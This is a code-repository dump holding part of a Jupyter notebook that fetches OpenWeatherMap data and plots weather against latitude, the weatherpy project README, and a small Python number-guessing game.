plt.figure(figsize=figsize)\n ax = fig.subplots(1,1)\n \n # scatter plot\n ax.plot(\n x, y,\n marker=marker,\n markersize=markersize,\n markeredgecolor=markeredgecolor,\n markeredgewidth=markeredgewidth,\n markerfacecolor=markerfacecolor,\n fillstyle=fillstyle,\n linestyle=linestyle,\n alpha=alpha,\n label=label,\n )\n # set title\n _ = ax.set_title(\n title,\n fontsize=fontsize_title,\n fontweight=\"bold\"\n )\n # set axis labels\n ax.set_xlabel(xlabel)\n ax.set_ylabel(ylabel)\n ax.xaxis.label.set_size(fontsize_label)\n ax.yaxis.label.set_size(fontsize_label)\n \n # set axis ticks\n [tick.label.set_fontsize(fontsize_xtick) for tick in ax.xaxis.get_major_ticks()]\n [tick.label.set_fontsize(fontsize_ytick) for tick in ax.yaxis.get_major_ticks()]\n \n # set axis range limits \n ax.set_xlim(xlim)\n ax.set_ylim(ylim)\n \n # set legend\n if legend and (label is not \"\"):\n ax.legend()\n \n # set grid\n if grid:\n ax.grid(\n True,\n color=\"grey\",\n linestyle=\":\",\n linewidth=1.5,\n alpha=0.5\n )\n \n # set tight layout\n plt.tight_layout()\n return ax\n\n\ndef scatter_weather_vs_latitude():\n \"\"\"Scatter plot weather trend vs. latitude. 
Wrapper fucntion to interface 'scatter' to perform\n weather data scatter plot, handeling different colors for north- and south-hemisphere.\n \"\"\"\n # set figure size\n fig = plt.figure(figsize=(figsize))\n ax = fig.subplots(1, 1)\n \n # get x-axes and y-axes data \n x = df[\"Latitude\"].values\n y = df[metric].values\n \n # set axes params \n xlabel = \"Latitude\"\n ylabel = f\"{metric} ({unit})\"\n time_str = time.strftime(\"'%Y-%m-%d %H:%M'\", current_time)\n title = f\"{metric} variations ({unit}) vs Latitude for {time_str}\"\n \n # scatter plot for north-hemisphere\n ax = scatter(\n x=x[x>=0],\n y=y[x>=0],\n markerfacecolor=\"red\",\n markeredgecolor=\"red\",\n xlabel=xlabel,\n ylabel=ylabel,\n title=title,\n xlim=[-90, 90],\n ylim=ylim,\n label=\"Northern Hemisphere\",\n ax=ax,\n )\n \n # scatter plot for south-hemisphere\n ax = scatter(\n x=x[x<0],\n y=y[x<0],\n markerfacecolor=\"navy\",\n markeredgecolor=\"navy\",\n xlabel=xlabel,\n ylabel=ylabel,\n title=title,\n xlim=[-90, 90],\n ylim=ylim,\n label=\"Southern Hemisphere\",\n ax=ax,\n )\n return ax, fig\n\n\ndef geomap_scatter(lats, lons, vals=None, vlim=None, markersize=4,\n fontsize_title=12, fontsize_label=11, fontsize_xtick=9, fontsize_ytick=9,\n alpha=0.95, title=\"\", label=\"\", figsize=(10, 7),\n colormap=\"bwr\"):\n \"\"\"Geomap plot weather trends. Wrapper fucntion to interface 'mpl_toolkits.basemap'to perform\n geo-map for weather data.\n \"\"\"\n \n \n # create figure/axis handler\n fig = plt.figure(figsize=figsize)\n ax = fig.subplots(1, 1)\n \n # create a base map object\n bmap = bm(\n projection='merc',\n llcrnrlat=-80,\n urcrnrlat=80,\n llcrnrlon=-180,\n urcrnrlon=180,\n lat_ts=50,\n resolution=\"l\")\n \n # draw coast lines\n bmap.drawcoastlines()\n \n # draw countries\n# bmap.drawcountries()\n \n # draw/set up parllel lines\n parallels = np.arange(-90.,91.,30.)\n bmap.drawparallels(parallels)\n bmap.drawparallels(\n parallels,\n labels=[True,False,False,False],\n fontsize=fontsize_ytick)\n \n # draw/set up meridians\n meridians = np.arange(-180.,181.,30.)\n bmap.drawmeridians(meridians)\n bmap.drawmeridians(\n meridians,\n labels=[True,False,False,True],\n fontsize=fontsize_xtick,)\n \n # draw/set up map boundaries\n bmap.drawmapboundary(fill_color='white')\n \n # draw/set up continents\n bmap.fillcontinents(color=\"#cc9955\", lake_color=\"steelblue\", alpha=0.2)\n \n # set title\n _ = ax.set_title(\n title,\n fontsize=fontsize_title,\n fontweight=\"bold\"\n )\n \n # set axis ticks\n [tick.label.set_fontsize(fontsize_xtick) for tick in ax.xaxis.get_major_ticks()]\n [tick.label.set_fontsize(fontsize_ytick) for tick in ax.yaxis.get_major_ticks()]\n plt.tight_layout() \n\n # tranform input lats and lons to map projections\n x, y = bmap(lons, lats)\n \n if vals is None:\n # perform 2-D scatter plot\n ax.plot(\n x, y,\n marker=\"o\",\n linestyle=\"\",\n linewidth=2,\n markerfacecolor=\"royalblue\",\n markeredgecolor=\"mediumblue\",\n markersize=markersize,\n alpha=alpha)\n else:\n # perom bubble plot\n if vlim is None:\n vlim = [min(vals), max(vals)]\n # set a colormap\n cmap = plt.cm.get_cmap(colormap)\n cax = plt.scatter(\n x=x, y=y, c=vals,\n vmin=vlim[0],\n vmax =vlim[1],\n cmap=cmap,\n s=50,\n edgecolors='none',\n alpha=.95,\n )\n # set color bar\n cbar = plt.colorbar(cax, shrink =1, pad=0.01)\n cbar.set_label(label)\n date = datetime.utcnow()\n CS = bmap.nightshade(date, alpha=0.2)\n \n # set tight layout\n plt.tight_layout()\n \n return ax, fig\n\n```\n\n### 3.5. 
Define setup parameters\n\n\n```python\n# set number of samples\nnm_samples = 700\n# set (latitude, longitude) intervals\nnm_lats = 100\nnm_lons = 100\n# set path to save figures\npath_fig = os.path.join(root_dir, \"reports\", \"figures\")\npath_log = os.path.join(root_dir, \"reports\", \"logs\")\n# set true to save figures\nsave_fig = True\n# set true to save results to csv\nsave_csv = True\n# set true to log print\nverbose = False\n# set figure size\nfigsize = (10, 7)\nmarkersize = 6\n# set api params\nurl = \"http://api.openweathermap.org/data/2.5/weather?\"\nunits = \"imperial\"\nparams = {\n \"appid\": api_key,\n \"units\": units\n}\n```\n\n\n```python\n# generate latitudes and longitudes\nlats = np.linspace(-90, 90, nm_lats)\nlons = np.linspace(-180, 180, nm_lons)\n```\n\n\n```python\ndf = pd.DataFrame()\ndf[\"City Name\"] = [\"\"]\ndf[\"Country Code\"] = [\"\"]\n\nindex = 0\nfor lat, lon in product(lats, lons):\n city = cp.nearest_city(lat, lon)\n city_name = city.city_name.title()\n country_code = city.country_code\n \n if not df[\"City Name\"].isin([city_name]).any():\n if verbose:\n print(\"{:4d} ({:+07.2f}{:s},{:+07.2f}{:s}) {:20s} {:s}\".format(\n index, lat, DEGREE, lon, DEGREE, city_name, country_code))\n df.loc[index, \"City Name\"] = city_name\n df.loc[index, \"Country Code\"] = country_code\n index += 1\n```\n\n\n```python\ndf.head(20)\n```\n\n\n\n\n<div>\n<style scoped>\n .dataframe tbody tr th:only-of-type {\n vertical-align: middle;\n }\n\n .dataframe tbody tr th {\n vertical-align: top;\n }\n\n .dataframe thead th {\n text-align: right;\n }\n</style>\n<table border=\"1\" class=\"dataframe\">\n <thead>\n <tr style=\"text-align: right;\">\n <th></th>\n <th>City Name</th>\n <th>Country Code</th>\n </tr>\n </thead>\n <tbody>\n <tr>\n <th>0</th>\n <td>Vaini</td>\n <td>to</td>\n </tr>\n <tr>\n <th>1</th>\n <td>Mataura</td>\n <td>pf</td>\n </tr>\n <tr>\n <th>2</th>\n <td>Rikitea</td>\n <td>pf</td>\n </tr>\n <tr>\n <th>3</th>\n <td>Punta Arenas</td>\n <td>cl</td>\n </tr>\n <tr>\n <th>4</th>\n <td>Ushuaia</td>\n <td>ar</td>\n </tr>\n <tr>\n <th>5</th>\n <td>Hermanus</td>\n <td>za</td>\n </tr>\n <tr>\n <th>6</th>\n <td>Bredasdorp</td>\n <td>za</td>\n </tr>\n <tr>\n <th>7</th>\n <td>Port Elizabeth</td>\n <td>za</td>\n </tr>\n <tr>\n <th>8</th>\n <td>Port Alfred</td>\n <td>za</td>\n </tr>\n <tr>\n <th>9</th>\n <td>East London</td>\n <td>za</td>\n </tr>\n <tr>\n <th>10</th>\n <td>Taolanaro</td>\n <td>mg</td>\n </tr>\n <tr>\n <th>11</th>\n <td>Busselton</td>\n <td>au</td>\n </tr>\n <tr>\n <th>12</th>\n <td>Albany</td>\n <td>au</td>\n </tr>\n <tr>\n <th>13</th>\n <td>New Norfolk</td>\n <td>au</td>\n </tr>\n <tr>\n <th>14</th>\n <td>Hobart</td>\n <td>au</td>\n </tr>\n <tr>\n <th>15</th>\n <td>Bluff</td>\n <td>nz</td>\n </tr>\n <tr>\n <th>16</th>\n <td>Kaitangata</td>\n <td>nz</td>\n </tr>\n <tr>\n <th>17</th>\n <td>Cape Town</td>\n <td>za</td>\n </tr>\n <tr>\n <th>18</th>\n <td>Kruisfontein</td>\n <td>za</td>\n </tr>\n <tr>\n <th>19</th>\n <td>Saint-Philippe</td>\n <td>re</td>\n </tr>\n </tbody>\n</table>\n</div>\n\n\n\n### 3.6. 
Collect evaluation city weather data\n\n\n```python\n# get 'n' random samples from collected cities \ndf = df.loc[\n np.random.choice(list(range(0, df.shape[0])),\n size=nm_samples,\n replace=False), :]\ndf[\"Latitude\"] = \"\"\ndf[\"Longitude\"] = \"\"\ndf[\"Temperature\"] = \"\"\ndf[\"Humidity\"] = \"\"\ndf[\"Cloudiness\"] = \"\"\ndf[\"Wind-Speed\"] = \"\"\ndf[\"Wind-Direction\"] = \"\"\n\n# get current time\ncurrent_time = time.gmtime()\n\n# collect weather data from API\nfor index, row in df.iterrows():\n city_name = row[\"City Name\"]\n country_code = row[\"Country Code\"]\n params[\"q\"] = f\"{city_name},{country_code}\"\n response_ = requests.get(url, params)\n response = response_.json()\n try:\n df.loc[index][\"Latitude\"] = response[\"coord\"][\"lat\"]\n df.loc[index][\"Longitude\"] = response[\"coord\"][\"lon\"]\n df.loc[index][\"Temperature\"] = response[\"main\"][\"temp\"]\n df.loc[index][\"Humidity\"] = response[\"main\"][\"humidity\"]\n df.loc[index][\"Cloudiness\"] = response[\"clouds\"][\"all\"] \n df.loc[index][\"Wind-Speed\"] = response[\"wind\"][\"speed\"]\n df.loc[index][\"Wind-Direction\"] = response[\"wind\"][\"deg\"]\n if verbose:\n print(f\"{index} {city_name} <{response_.url}>: OK\")\n except (KeyError, IndexError):\n if verbose:\n print(f\"{index} {city_name} <{response_.url}>: ERROR, skipped\")\n df.drop(labels=index, inplace=True)\ndf = df.reset_index()\n```\n\n\n```python\ndf.head(20)\n```\n\n\n\n\n<div>\n<style scoped>\n .dataframe tbody tr th:only-of-type {\n vertical-align: middle;\n }\n\n .dataframe tbody tr th {\n vertical-align: top;\n }\n\n .dataframe thead th {\n text-align: right;\n }\n</style>\n<table border=\"1\" class=\"dataframe\">\n <thead>\n <tr style=\"text-align: right;\">\n <th></th>\n <th>index</th>\n <th>City Name</th>\n <th>Country Code</th>\n <th>Latitude</th>\n <th>Longitude</th>\n <th>Temperature</th>\n <th>Humidity</th>\n <th>Cloudiness</th>\n <th>Wind-Speed</th>\n <th>Wind-Direction</th>\n </tr>\n </thead>\n <tbody>\n <tr>\n <th>0</th>\n <td>2362</td>\n <td>Aklavik</td>\n <td>ca</td>\n <td>68.22</td>\n <td>-135.01</td>\n <td>28.4</td>\n <td>92</td>\n <td>90</td>\n <td>9.17</td>\n <td>280</td>\n </tr>\n <tr>\n <th>1</th>\n <td>1585</td>\n <td>Kaka</td>\n <td>tm</td>\n <td>37.35</td>\n <td>59.62</td>\n <td>87.58</td>\n <td>30</td>\n <td>0</td>\n <td>3.71</td>\n <td>52.0002</td>\n </tr>\n <tr>\n <th>2</th>\n <td>103</td>\n <td>Veinticinco De Mayo</td>\n <td>ar</td>\n <td>-27.38</td>\n <td>-54.75</td>\n <td>49.69</td>\n <td>88</td>\n <td>36</td>\n <td>2.71</td>\n <td>95.5002</td>\n </tr>\n <tr>\n <th>3</th>\n <td>354</td>\n <td>Tsiroanomandidy</td>\n <td>mg</td>\n <td>-18.77</td>\n <td>46.05</td>\n <td>80.5</td>\n <td>33</td>\n <td>0</td>\n <td>5.53</td>\n <td>116.502</td>\n </tr>\n <tr>\n <th>4</th>\n <td>81</td>\n <td>Lakes Entrance</td>\n <td>au</td>\n <td>-37.88</td>\n <td>147.99</td>\n <td>53.47</td>\n <td>95</td>\n <td>0</td>\n <td>6.96</td>\n <td>80.5002</td>\n </tr>\n <tr>\n <th>5</th>\n <td>2390</td>\n <td>Zhigansk</td>\n <td>ru</td>\n <td>66.77</td>\n <td>123.37</td>\n <td>56.44</td>\n <td>41</td>\n <td>12</td>\n <td>3.71</td>\n <td>357</td>\n </tr>\n <tr>\n <th>6</th>\n <td>742</td>\n <td>Amapa</td>\n <td>br</td>\n <td>-1.83</td>\n <td>-56.23</td>\n <td>75.16</td>\n <td>93</td>\n <td>0</td>\n <td>2.37</td>\n <td>20.0002</td>\n </tr>\n <tr>\n <th>7</th>\n <td>1018</td>\n <td>Lahij</td>\n <td>ye</td>\n <td>13.06</td>\n <td>44.88</td>\n <td>106.75</td>\n <td>21</td>\n <td>0</td>\n <td>8.63</td>\n <td>147</td>\n </tr>\n <tr>\n 
<th>8</th>\n <td>2356</td>\n <td>Sangar</td>\n <td>ru</td>\n <td>63.92</td>\n <td>127.47</td>\n <td>63.64</td>\n <td>31</td>\n <td>0</td>\n <td>6.85</td>\n <td>302</td>\n </tr>\n <tr>\n <th>9</th>\n <td>745</td>\n <td>Jardim</td>\n <td>br</td>\n <td>-21.48</td>\n <td>-56.15</td>\n <td>64.99</td>\n <td>78</td>\n <td>12</td>\n <td>10.09</td>\n <td>81.0002</td>\n </tr>\n <tr>\n <th>10</th>\n <td>1681</td>\n <td>Sitges</td>\n <td>es</td>\n <td>41.24</td>\n <td>1.82</td>\n <td>68.58</td>\n <td>77</td>\n <td>75</td>\n <td>17.22</td>\n <td>60</td>\n </tr>\n <tr>\n <th>11</th>\n <td>1984</td>\n <td>Zavitinsk</td>\n <td>ru</td>\n <td>50.11</td>\n <td>129.44</td>\n <td>61.03</td>\n <td>56</td>\n <td>44</td>\n <td>2.37</td>\n <td>230.5</td>\n </tr>\n <tr>\n <th>12</th>\n <td>1603</td>\n <td>Ishinomaki</td>\n <td>jp</td>\n <td>38.42</td>\n <td>141.3</td>\n <td>64.4</td>\n <td>63</td>\n <td>40</td>\n <td>11.41</td>\n <td>120</td>\n </tr>\n <tr>\n <th>13</th>\n <td>1427</td>\n <td>Yafran</td>\n <td>ly</td>\n <td>32.06</td>\n <td>12.53</td>\n <td>77.68</td>\n <td>46</td>\n <td>0</td>\n <td>3.94</td>\n <td>123</td>\n </tr>\n <tr>\n <th>14</th>\n <td>2313</td>\n <td>Troitsko-Pechorsk</td>\n <td>ru</td>\n <td>62.71</td>\n <td>56.19</td>\n <td>53.74</td>\n <td>56</td>\n <td>0</td>\n <td>7.85</td>\n <td>268.5</td>\n </tr>\n <tr>\n <th>15</th>\n <td>1459</td>\n <td>Portales</td>\n <td>us</td>\n <td>34.19</td>\n <td>-103.33</td>\n <td>67.55</td>\n <td>51</td>\n <td>1</td>\n <td>4.7</td>\n <td>90</td>\n </tr>\n <tr>\n <th>16</th>\n <td>853</td>\n <td>Labuan</td>\n <td>my</td>\n <td>5.33</td>\n <td>115.2</td>\n <td>88.79</td>\n <td>74</td>\n <td>75</td>\n <td>8.05</td>\n <td>280</td>\n </tr>\n <tr>\n <th>17</th>\n <td>529</td>\n <td>Jatiroto</td>\n <td>id</td>\n <td>-7.61</td>\n <td>109.46</td>\n <td>82.63</td>\n <td>88</td>\n <td>44</td>\n <td>15.79</td>\n <td>126.5</td>\n </tr>\n <tr>\n <th>18</th>\n <td>1827</td>\n <td>Merrill</td>\n <td>us</td>\n <td>42.03</td>\n <td>-121.6</td>\n <td>48.2</td>\n <td>87</td>\n <td>90</td>\n <td>11.41</td>\n <td>250</td>\n </tr>\n <tr>\n <th>19</th>\n <td>1007</td>\n <td>Sokoto</td>\n <td>ng</td>\n <td>13.06</td>\n <td>5.24</td>\n <td>85.42</td>\n <td>76</td>\n <td>48</td>\n <td>12.44</td>\n <td>206</td>\n </tr>\n </tbody>\n</table>\n</div>\n\n\n\n### 3.7. Plot city distribution map\n\n\n```python\ntime_str = time.strftime(\"'%Y-%m-%d %H:%M'\", current_time)\ntitle = f\"City Weather Data Distribution for {time_str}\"\n\nax, fig = geomap_scatter(\n df[\"Latitude\"].values,\n df[\"Longitude\"].values,\n vals=None,\n vlim=None,\n markersize=markersize,\n title=title,\n figsize=figsize)\nif save_fig:\n time_str = time.strftime(\"%Y-%m-%d-%H-%M\", current_time)\n fig.savefig(os.path.join(path_fig, f\"city-distribution-{time_str}\"),\n transparent=False, bbox_inches=\"tight\")\n```\n\n /home/h8147/miniconda3/envs/data-bootcamp/lib/python3.6/site-packages/mpl_toolkits/basemap/__init__.py:1708: MatplotlibDeprecationWarning: The axesPatch function was deprecated in version 2.1. Use Axes.patch instead.\n limb = ax.axesPatch\n /home/h8147/miniconda3/envs/data-bootcamp/lib/python3.6/site-packages/mpl_toolkits/basemap/__init__.py:1711: MatplotlibDeprecationWarning: The axesPatch function was deprecated in version 2.1. Use Axes.patch instead.\n if limb is not ax.axesPatch:\n\n\n\n![png](../images/output_22_1.png)\n\n\n### 3.8. Scatter plots\n\n### 3.8.1. Temperature vs. 
Latitude\n\n\n```python\nmetric = \"Temperature\"\nunit = f\"{DEGREE}F\"\nylim = None\n\nax , fig = scatter_weather_vs_latitude()\nif save_fig:\n time_str = time.strftime(\"%Y-%m-%d-%H-%M\", current_time)\n fig.savefig(os.path.join(path_fig, f\"{metric}\".lower() + f\"-vs-latitude-{time_str}\"),\n transparent=False, bbox_inches=\"tight\")\n```\n\n\n![png](../images/output_25_0.png)\n\n\n### 3.8.2. Humidity vs. Latitude\n\n\n```python\nmetric = \"Humidity\"\nunit = \"%\"\nylim = [0, 100]\n\nax , fig = scatter_weather_vs_latitude()\nif save_fig:\n time_str = time.strftime(\"%Y-%m-%d-%H-%M\", current_time)\n fig.savefig(os.path.join(path_fig, f\"{metric}\".lower() + f\"-vs-latitude-{time_str}\"),\n transparent=False, bbox_inches=\"tight\")\n```\n\n\n![png](../images/output_27_0.png)\n\n\n### 3.8.3. Cloudiness vs. Latitude\n\n\n```python\nmetric = \"Cloudiness\"\nunit = \"%\"\nylim = [0, 100]\n\n\nax , fig = scatter_weather_vs_latitude()\nif save_fig:\n time_str = time.strftime(\"%Y-%m-%d-%H-%M\", current_time)\n fig.savefig(os.path.join(path_fig, f\"{metric}\".lower() + f\"-vs-latitude-{time_str}\"),\n transparent=False, bbox_inches=\"tight\")\n```\n\n\n![png](../images/output_29_0.png)\n\n\n### 3.8.4. Wind-Speed vs. Latitude\n\n\n```python\nmetric = \"Wind-Speed\"\nunit = \"mph\"\nylim = None\n\nax, fig = scatter_weather_vs_latitude()\nif save_fig:\n time_str = time.strftime(\"%Y-%m-%d-%H-%M\", current_time)\n fig.savefig(os.path.join(path_fig, f\"{metric}\".lower() + f\"-vs-latitude-{time_str}\"),\n transparent=False, bbox_inches=\"tight\")\n```\n\n\n![png](../images/output_31_0.png)\n\n\n### 3.9. Geomaps\n\n### 3.9.1. Temperature\n\n\n```python\nmetric = \"Temperature\"\nunit = f\"{DEGREE}F\"\ncolormap = \"bwr\"\nvlim = None\n\ntime_str = time.strftime(\"'%Y-%m-%d %H:%M'\", current_time)\ntitle = f\"{metric} ({unit}) Geomap for {time_str}\"\nax , fig = geomap_scatter(df[\"Latitude\"].values,\n df[\"Longitude\"].values,\n df[metric].values,\n vlim=vlim,\n markersize=markersize,\n title=title,\n figsize=figsize,\n colormap=colormap)\nif save_fig:\n time_str = time.strftime(\"%Y-%m-%d-%H-%M\", current_time)\n fig.savefig(os.path.join(path_fig, f\"{metric}\".lower() + f\"-geomap-{time_str}\"),\n transparent=False, bbox_inches=\"tight\")\n```\n\n /home/h8147/miniconda3/envs/data-bootcamp/lib/python3.6/site-packages/mpl_toolkits/basemap/__init__.py:1708: MatplotlibDeprecationWarning: The axesPatch function was deprecated in version 2.1. Use Axes.patch instead.\n limb = ax.axesPatch\n /home/h8147/miniconda3/envs/data-bootcamp/lib/python3.6/site-packages/mpl_toolkits/basemap/__init__.py:1711: MatplotlibDeprecationWarning: The axesPatch function was deprecated in version 2.1. Use Axes.patch instead.\n if limb is not ax.axesPatch:\n\n\n\n![png](../images/output_34_1.png)\n\n\n### 3.9.2. 
Humidity\n\n\n```python\nmetric = \"Humidity\"\nunit = \"%\"\ncolormap = \"BrBG\"\nvlim = None\n\ntime_str = time.strftime(\"'%Y-%m-%d %H:%M'\", current_time)\ntitle = f\"{metric} ({unit}) Geomap for {time_str}\"\nax , fig = geomap_scatter(df[\"Latitude\"].values,\n df[\"Longitude\"].values,\n df[metric].values,\n vlim=vlim,\n markersize=markersize,\n title=title,\n figsize=figsize,\n colormap=colormap)\nif save_fig:\n time_str = time.strftime(\"%Y-%m-%d-%H-%M\", current_time)\n fig.savefig(os.path.join(path_fig, f\"{metric}\".lower() + f\"-geomap-{time_str}\"),\n transparent=False, bbox_inches=\"tight\")\n```\n\n /home/h8147/miniconda3/envs/data-bootcamp/lib/python3.6/site-packages/mpl_toolkits/basemap/__init__.py:1708: MatplotlibDeprecationWarning: The axesPatch function was deprecated in version 2.1. Use Axes.patch instead.\n limb = ax.axesPatch\n /home/h8147/miniconda3/envs/data-bootcamp/lib/python3.6/site-packages/mpl_toolkits/basemap/__init__.py:1711: MatplotlibDeprecationWarning: The axesPatch function was deprecated in version 2.1. Use Axes.patch instead.\n if limb is not ax.axesPatch:\n\n\n\n![png](../images/output_36_1.png)\n\n\n### 3.9.3. Cloudiness\n\n\n```python\nmetric = \"Cloudiness\"\nunit = \"%\"\ncolormap = \"hot\"\nvlim = None\n\ntime_str = time.strftime(\"'%Y-%m-%d %H:%M'\", current_time)\ntitle = f\"{metric} ({unit}) Geomap for {time_str}\"\nax , fig = geomap_scatter(df[\"Latitude\"].values,\n df[\"Longitude\"].values,\n df[metric].values,\n vlim=vlim,\n markersize=markersize,\n title=title,\n figsize=figsize,\n colormap=colormap)\nif save_fig:\n time_str = time.strftime(\"%Y-%m-%d-%H-%M\", current_time)\n fig.savefig(os.path.join(path_fig, f\"{metric}\".lower() + f\"-geomap-{time_str}\"),\n transparent=False, bbox_inches=\"tight\")\n```\n\n /home/h8147/miniconda3/envs/data-bootcamp/lib/python3.6/site-packages/mpl_toolkits/basemap/__init__.py:1708: MatplotlibDeprecationWarning: The axesPatch function was deprecated in version 2.1. Use Axes.patch instead.\n limb = ax.axesPatch\n /home/h8147/miniconda3/envs/data-bootcamp/lib/python3.6/site-packages/mpl_toolkits/basemap/__init__.py:1711: MatplotlibDeprecationWarning: The axesPatch function was deprecated in version 2.1. Use Axes.patch instead.\n if limb is not ax.axesPatch:\n\n\n\n![png](../images/output_38_1.png)\n\n\n### 3.9.4. Wind-Speed\n\n\n```python\nmetric = \"Wind-Speed\"\nunit = \"%\"\ncolormap = \"seismic\"\nvlim = None\n\ntime_str = time.strftime(\"'%Y-%m-%d %H:%M'\", current_time)\ntitle = f\"{metric} ({unit}) Geomap for {time_str}\"\nax , fig = geomap_scatter(df[\"Latitude\"].values,\n df[\"Longitude\"].values,\n df[metric].values,\n vlim=vlim,\n markersize=markersize,\n title=title,\n figsize=figsize,\n colormap=colormap)\nif save_fig:\n time_str = time.strftime(\"%Y-%m-%d-%H-%M\", current_time)\n fig.savefig(os.path.join(path_fig, f\"{metric}\".lower() + f\"-geomap-{time_str}\"),\n transparent=False, bbox_inches=\"tight\")\n```\n\n /home/h8147/miniconda3/envs/data-bootcamp/lib/python3.6/site-packages/mpl_toolkits/basemap/__init__.py:1708: MatplotlibDeprecationWarning: The axesPatch function was deprecated in version 2.1. Use Axes.patch instead.\n limb = ax.axesPatch\n /home/h8147/miniconda3/envs/data-bootcamp/lib/python3.6/site-packages/mpl_toolkits/basemap/__init__.py:1711: MatplotlibDeprecationWarning: The axesPatch function was deprecated in version 2.1. Use Axes.patch instead.\n if limb is not ax.axesPatch:\n\n\n\n![png](../images/output_40_1.png)\n\n\n### 3.10. 
Save city eval data\n\n\n```python\nif save_csv:\n    time_str = time.strftime(\"%Y-%m-%d-%H-%M\", current_time)\n    df.to_csv(os.path.join(path_log, f\"city-weather-{time_str}.csv\"))\n```\n" }, { "alpha_fraction": 0.7398597002029419, "alphanum_fraction": 0.7538883686065674, "avg_line_length": 41.02564239501953, "blob_id": "875b627129796488497a07255bacaa45e6b743b8", "content_id": "78c28eb59d15e6cf57fd4b00835809c2ad1dc30b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3317, "license_type": "no_license", "max_line_length": 204, "num_lines": 78, "path": "/README.md", "repo_name": "aidinhass/weatherpy", "src_encoding": "UTF-8", "text": "# What's the Weather Like?\n\nBy *Aidin Hassanzadeh*\n___\n\nThis repository contains Python/IPython Notebook files for the 'What's the Weather Like?' project.\nThe aim of this project is to perform a quantitative analysis of different weather trends with respect to latitude.\nThis project addresses the following objectives:\n\n- Demonstrate and analyze Temperature variations (F) vs. Latitude\n- Demonstrate and analyze Humidity variations (%) vs. Latitude\n- Demonstrate and analyze Cloudiness variations (%) vs. Latitude\n- Demonstrate and analyze Wind Speed variations (mph) vs. Latitude\n- Demonstrate and analyze Temperature variations (F) vs. Latitude-Longitude\n- Demonstrate and analyze Humidity variations (%) vs. Latitude-Longitude\n- Demonstrate and analyze Cloudiness variations (%) vs. Latitude-Longitude\n- Demonstrate and analyze Wind Speed variations (mph) vs. Latitude-Longitude\n\n## Data\nThe evaluation weather data is a collection of current weather data retrieved from 1000 different cities uniformly sampled from across the world.\nThis data set is collected through the [OpenWeatherMap Current Weather API](https://openweathermap.org/current), regularly updated by more than 40,000 weather stations covering over 200,000 cities world wide.\n\nTo obtain uniformly distributed city weather data, cities were sampled by a 2-dimensional uniform latitude-longitude grid sampling scheme.\nA uniform linear grid of latitudes and longitudes with fixed spacing was created and a set of unique cities was uniformly sampled based on the vertices of the grid.\nThe generation of the evaluation data consists of the following stages:\n\n- Create a uniform latitude-longitude grid with fixed equal spacing\n- Assign a unique city to each grid vertex\n- From the collected cities, draw $n$ samples uniformly at random, without replacement.
\n\nThe city to grid assignment was performed by the [citipy](https://github.com/wingchen/citipy.git) module.\n\n## Report\nThe visual report containing the discovered insights and the detailed implementation is available as a Jupyter Notebook [here](https://github.com/aidinhass/weatherpy/blob/master/notebooks/README.md).\n\n## Requirements\n- python=3.6.5\n- jupyter=1.0.0\n- nb_conda=2.2.1\n- numpy=1.14.2\n- matplotlib=2.2.2\n- pandas=0.22.0\n- scipy=1.1.0\n- basemap=1.1.0\n- citipy=0.0.1\n\n## Directory Structure\nThis repo contains the following directories:\n\n```bash\n├── images    <- Images for README.md files.\n├── notebooks <- IPython notebook files.\n├── reports   <- Generated analysis as HTML, PDF, LaTeX, etc.\n│   ├── figures <- Generated graphics and figures to be used in reporting\n│   └── logs    <- Generated log files\n└── src       <- Source code for use in this project.\n```\n\n### Installation\nInstall Python dependencies from `requirements.txt` using conda.\n```bash\nconda install --yes --file requirements.txt\n```\n\nOr create a new conda environment `<new-env-name>` by importing a copy of a working conda environment stored at the root directory: `weatherpy.yml`.\n```bash\nconda env create --name <new-env-name> -f \"weatherpy.yml\"\n```\n\n## References\n- [OpenWeatherMap Current Weather API](https://openweathermap.org/current)\n- [citipy](https://github.com/wingchen/citipy.git)\n\n## To Do\n- [ ] Add geomap analyses\n\n## License\nNA\n\n" } ]
3
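For reference, a condensed sketch of the grid-sampling scheme described in the README's Data section, mirroring the notebook code in this record: build a uniform latitude-longitude grid, map each vertex to its nearest `citipy` city, de-duplicate, then draw `n` cities without replacement. The function name and defaults are illustrative, not from the repo.

```python
# Sketch of the lat/lon grid sampling from the Data section
# (assumes the citipy and numpy packages).
from itertools import product

import numpy as np
from citipy import citipy


def sample_cities(n_samples=500, n_lats=100, n_lons=100):
    lats = np.linspace(-90, 90, n_lats)
    lons = np.linspace(-180, 180, n_lons)

    # map every grid vertex to its nearest city, keeping each city once
    seen = {}
    for lat, lon in product(lats, lons):
        city = citipy.nearest_city(lat, lon)
        seen.setdefault((city.city_name.title(), city.country_code), None)

    cities = list(seen)
    # draw n cities uniformly at random, without replacement
    idx = np.random.choice(len(cities), size=min(n_samples, len(cities)),
                           replace=False)
    return [cities[i] for i in idx]


if __name__ == "__main__":
    print(sample_cities(n_samples=5))
```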
ededd9/GuessingGame
https://github.com/ededd9/GuessingGame
df06c84fa9d26736be4e5546d0c50b8d165cc319
a323f397f58930911510dfb53ec142f1e0d99c70
87511a84d0cc5206239af107b7bebb9a1b364ba3
refs/heads/master
2020-09-15T09:32:22.423228
2019-11-21T14:14:25
2019-11-21T14:14:25
223,411,434
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.568854570388794, "alphanum_fraction": 0.5855855941772461, "avg_line_length": 26.785715103149414, "blob_id": "34bb5ad8d58dc526d67eaaee743dafceca6cc602", "content_id": "6157f8fecae66cde4236b05b22412b858b506fa9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 815, "license_type": "no_license", "max_line_length": 95, "num_lines": 28, "path": "/GuessingGame.py", "repo_name": "ededd9/GuessingGame", "src_encoding": "UTF-8", "text": "import random\nprint (\"Hi, this is a simple Guessing Game ¯\\_(ツ)_/¯ . Please guess a number betwee 0 and 10!\")\nrandomint = random.randint(0,10)\ntries = 0\n\nwhile tries < 3:\n userinput = int(input())\n \n if userinput == randomint:\n tries+=1\n break\n \n elif userinput > randomint:\n print (\"Try a smaller number ( ͡° ͜ʖ ͡°) !\")\n tries+=1\n if tries == 3:\n break\n elif userinput < randomint:\n print (\"Try a bigger number ( ‾ ʖ̫ ‾) !\")\n tries+=1\n if tries == 3:\n break\n \nif userinput == randomint:\n print ('Good job! It took you ' + str(tries) + ' tries (ᴗ ͜ʖ ᴗ) !')\nif userinput != randomint:\n print ('Wow, you suck. You failed about umm.. ' + str(tries) + ' times (╯ ͠° ͟ʖ ͡°)╯┻━┻')\nprint ('This was the correct number: ' + str(randomint))" } ]
1
